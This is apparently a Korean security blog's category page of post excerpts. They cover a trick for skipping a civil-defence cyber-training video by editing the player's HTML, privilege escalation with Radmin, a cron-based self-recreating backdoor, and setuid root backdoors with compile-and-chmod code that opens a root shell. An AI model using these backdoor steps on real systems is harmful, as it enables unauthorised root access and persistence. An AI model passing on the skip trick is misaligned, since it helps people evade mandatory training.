반응형

시스템보안(지식창고) 12

2022 민방위 사이버 교육 동영상 스킵 방법

의외로 꽤나 허술하게 만들어져있었다;; 나는 다 수강했는데, 혹시라도 사용해볼 사람들이 있으면 해보시길 바랍니다./ vjs_video_3 라는 태그가 동영상 플레이어인데 크롬에서 html수정하기로 같이 수정해주시면 동영상 시간수정이 가능합니다. 시간 제일 뒤로해주시면 강의가 종료되면서 다음강의가 뜹니다. 다들 꿀빠세요!

visual route 공격자 추적 및 sis참고사이트

http://download.visualware.com/ 인터넷 침해사고 대응지원 센터 : http://www.krcert.or.kr/ (1위) - 한국인터넷진흥원 : http://www.kisa.or.kr/ (2위) - 정보보호 온라인 학습장 : http://www.sis.or.kr/ (무료, 3위) - 리눅스 학습 : http://sol9501.blog.me/ (은수네집, 4위) - 국가법령정보센터 : http://www.law.go.kr/main.html (최신 법률, 시행령 등) - 본인의 블로그 : http://nologout.blog.me/ - 개인정보보호 포털 : http://www.i-privacy.kr/ (PIMS) - IPv6 주소 변환 : http://vsix.kisa.or.kr/ -..

windows script host

http://m.cafe.naver.com/myprogramming/59 강좌 시작 > 이전 강좌를 통해서 여러분은.... WSH 를 통해서 서버단에서 뭔가의 작업을 VB나 VC++의 사용없이, 가벼운 스크립트만으로 처리할 수 있지 않을까하는 기대를 살며시 가질 수 있었습니다. 그렇습니다. 가벼운 소소한 작업들이라면 굳이 언어의 힘을 빌리지 않아도 스크립트만으로도 충분히 멋지에 소화해 낼 수가 있지요... 이번에 할 작업은... 먼저, NT 시스템에서 기본적으로 제공하는 스케쥴러를 사용하는 방법입니다. NT 서버의 명령 프롬프트에서는 AT 이라는 명령어를 통해서 스케쥴을 걸 수가 있습니다. 이를 사용하면 특정 작업을 우리가 지정하는 시간에 일어나게 할 수가 있지요... NT를 공부하신 분은 아마도 다 아..

시스템 권한 해킹 기법

안녕하세요. 문보안관 입니다. 해커가 만약 침투할 컴퓨터에 침입을 성공하였더라도 그 컴퓨터에 대한 권한이 없다면 마음대로 해킹 할 수 없다. 그만큼 목표 컴퓨터의 권한을 획득한다는 것은 침입을 성공하는 것만큼 중요한 작업이다. 본 자료는 해커가 침입을 성공한 후 권한을 상승하는 기법에 대해 9가지로 정리하여 설명하고 있다. 1. RAdmin 툴을 이용한 권한 상승 Radmin 툴 ( 기본 포트 : 4899 ) 은 자신의 컴퓨터에서 원격 컴퓨터를 제어하는 프로그램 으로서 파일 전송, NT 보안, 텔넷 등의 주요한 기능을 원격에서 사용할 수 있다. 침투할 서버에 대한 약간의 권한이 존재하고 방화벽이 존재하지 않는다면 Radmin 서버를 압축하고 업로드 한 다음 실행하고 클라이언트로 접속을 한다. [Radmi..

cron 데몬을 이용한 백도어 생성

cron 데몬은 대형서버에서 접속자가 없는 새벽시간에 자동으로 서버를 백업하기 위한 목적(반복성 작업 예약 목적)으로 쓰였습니다. 그러나 해커들은 이를 악용하여 자동으로 백도어를 생성하는 방법을 개발하였습니다. Cron 데몬을 이용한 백도어 만들기 Cron데몬을 이용하여 백도어를 만든다면, 관리자가 #find / -user root -perm +4000 명령어를 통해 setuid가 설정된 백도어를 찾아 이를 삭제한다 해도, 설정한 주기가 지난 후에 자동으로 백도어가 다시 생성되게 할 수 있습니다. #vi /etc/crontab 을 쳐보면 다음과 같은 화면이 뜹니다. 여기서 특정 파일을 특정 시간에 특정 사용자 권한으로 실행시키도록 설정할 수 있습니다. 설정의 기본 틀은 이렇습니다. * * * * * 사용..

Setuid를 이용한 백도어 만들기(3)- 백도어 찾아내기와 백도어 숨기기

이번에는 백도어를 찾는 방법과, 또 숨기는 방법에 대해 포스팅하겠습니다. (1) 백도어 찾아내기 먼저 앞의 두 포스팅에서 setuid를 이용하여 어떻게 백도어를 만들었는지 잠시 흐름을 되짚어봅시다. 우선 루트사용자 권한으로 빈 파일을 만들어 코딩을 하고 이를 gcc로 컴파일한뒤, setuid 설정 및 접근권한을 변경시켜 주었습니다. 여기서 우리는 백도어의 두가지 특성을 알 수 있습니다. 1. 소유자가 root이다. - setuid 자체가 실행 시 그 파일의 소유자의 권한을 잠시 얻게되는 모드이기 때문에 setuid 백도어 파일의 소유자는 root일 수 밖에 없습니다. 2. 접근권한이 4000이상이다. - chmod로 파일을 setuid로 설정할 시 백도어 파일의 접근권한 세자리 숫자( ex: 755) 앞..

Setuid를 이용한 백도어 만들기(2)-백도어를 만드는 또 다른 방법들

이번에는 백도어를 만드는 두번째 방법입니다. 먼저 backvi.c라는 파일을 vi로 만들어줍니다. #vi backvi.c 그리고 내부에 다음 코드를 입력합니다. #include main(){ setuid(0); setgid(0); system("/bin/vi"); } #gcc -o backvi backvi.c 명령어로 코딩한 것을 컴파일합니다. #chmod 4755 backvi 로 백도어의 접근권한을 바꿔주고 setuid설정을 해줍니다. 이제 백도어가 만들어졌습니다. 일반사용자 모드로 접속하여 백도어를 실행시켜봅니다. $./backvi ㄴ 위와 같은 화면이 뜨면 :!/bin/bash 를 입력하고 enter를 눌러봅니다. 깔끔하게 루트 권한으로 넘어갔네요! 다음은 세번째 방법입니다. 먼저 #vi backe..

반응형